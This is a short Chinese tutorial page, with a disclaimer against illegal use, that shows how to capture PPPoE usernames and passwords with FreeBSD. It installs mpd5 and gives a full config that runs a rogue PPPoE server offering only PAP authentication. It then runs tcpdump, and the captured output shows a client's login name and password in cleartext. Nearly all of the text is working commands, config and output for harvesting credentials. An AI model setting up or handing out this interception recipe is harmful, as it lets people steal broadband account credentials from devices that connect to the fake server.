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 Android教程網 >> Android技術 >> Android開發 >> 關於android開發 >> 用FreeBSD抓取PPPoE帳號和密碼(勿用非法用途!)






  1. pkg install mpd5


  1. # cat mpd.conf
  2. startup:
  3. # configure mpd users
  4. set user foo bar admin
  5. set user foo1 bar1
  6. # configure the console
  7. set console self 5005
  8. set console open
  9. # configure the web server
  10. set web self 5006
  11. set web open

  12. #
  13. # Default configuration is "dialup"

  14. default:
  15. load pppoe_server

  16. common:
  17. # Enable multilink protocol
  18. set link enable multilink
  19. # Set bundle template to use
  20. set link action bundle B
  21. # Allow peer to authenticate us
  22. set link disable chap pap
  23. set link accept chap pap
  24. set auth authname MyLogin
  25. # Set inifinite redial attempts
  26. set link max-redial 0
  27. set modem var $DialPrefix "DT"
  28. set modem var $Telephone "1-415-555-1212"
  29. set modem script DialPeer

  30. pppoe_server:
  31. #
  32. # Multihomed multilink PPPoE server
  33. #

  34. # Create clonable bundle template
  35. create bundle template B
  36. # Set IP addresses. Peer address will be later replaced by RADIUS.
  37. set ipcp ranges

  38. # Create link template with common info
  39. create link template common pppoe
  40. # Enable multilink protocol
  41. set link enable multilink
  42. # Set bundle template to use
  43. set link action bundle B
  44. # Enable peer authentication
  45. set link disable chap pap eap
  46. set link enable pap
  47. # load radius
  48. set pppoe service "*"

  49. # Create templates for ifaces to listen using 'common' template and let them go
  50. create link template em0 common
  51. set link max-children 1000
  52. set pppoe iface em0
  53. set link enable incoming


  1. /usr/local/etc/rc.d/mpd5 onestart


  1. # tcpdump -ani em0 pppoes
  2. tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
  3. listening on em0, link-type EN10MB (Ethernet), capture size 65535 bytes
  4. 18:09:07.901865 PPPoE [ses 0x4a] LCP, Conf-Request (0x01), id 1, length 37
  5. 18:09:08.942933 PPPoE [ses 0x4a] LCP, Conf-Request (0x01), id 147, length 26
  6. 18:09:08.943601 PPPoE [ses 0x4a] LCP, Conf-Reject (0x04), id 1, length 12
  7. 18:09:08.943726 PPPoE [ses 0x4a] LCP, Conf-Reject (0x04), id 147, length 8
  8. 18:09:08.943996 PPPoE [ses 0x4a] LCP, Conf-Request (0x01), id 2, length 22
  9. 18:09:08.944447 PPPoE [ses 0x4a] LCP, Conf-Request (0x01), id 148, length 24
  10. 18:09:08.945266 PPPoE [ses 0x4a] LCP, Conf-Ack (0x02), id 2, length 22
  11. 18:09:08.945282 PPPoE [ses 0x4a] LCP, Conf-Ack (0x02), id 148, length 24
  12. 18:09:08.946030 PPPoE [ses 0x4a] PAP, Auth-Req (0x01), id 1, Peer csh, Name 123456
  13. 18:09:08.947405 PPPoE [ses 0x4a] PAP, Auth-NACK (0x03), id 1, Msg Login incorrect
  14. 18:09:08.947938 PPPoE [ses 0x4a] LCP, Term-Request (0x05), id 3, length 6
  15. 18:09:08.948400 PPPoE [ses 0x4a] LCP, Term-Request (0x05), id 149, length 6
  16. 18:09:08.948733 PPPoE [ses 0x4a] LCP, Term-Ack (0x06), id 4, length 6
  17. 18:09:08.949086 PPPoE [ses 0x4a] LCP, Term-Ack (0x06), id 3, length 6
  18. ^C
  19. 14 packets captured
  20. 29 packets received by filter
  21. 0 packets dropped by kernel



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